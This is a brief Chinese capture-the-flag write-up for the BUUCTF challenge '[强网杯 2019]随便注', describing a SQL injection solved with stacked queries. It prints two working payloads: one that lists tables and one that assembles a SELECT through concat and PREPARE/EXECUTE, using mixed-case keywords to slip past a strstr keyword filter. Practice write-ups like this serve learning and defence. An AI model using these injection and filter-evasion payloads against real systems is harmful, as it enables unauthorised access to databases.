2019-09-15 BUUCTF [强网杯 2019]随便注 1 WriteUp

首先尝试了直接无过滤提取数据数据库,发现失败了(select等关键词被过滤)
查看了别人的题解发现这题支持多语句执行(以后要注意多语句)
使用payload:0';show tables;#成功获取表名
使用payload:0';set @sql=cOncat('sel','ect * frOm `1919810931114514`');pRepare presql fRom @sql;eXecute presql;deAllocate prEpare presql;#成功得到flag(关键词大小写是为了避过strstr的关键词过滤)

你可能感兴趣的:(2019-09-15 BUUCTF [强网杯 2019]随便注 1 WriteUp)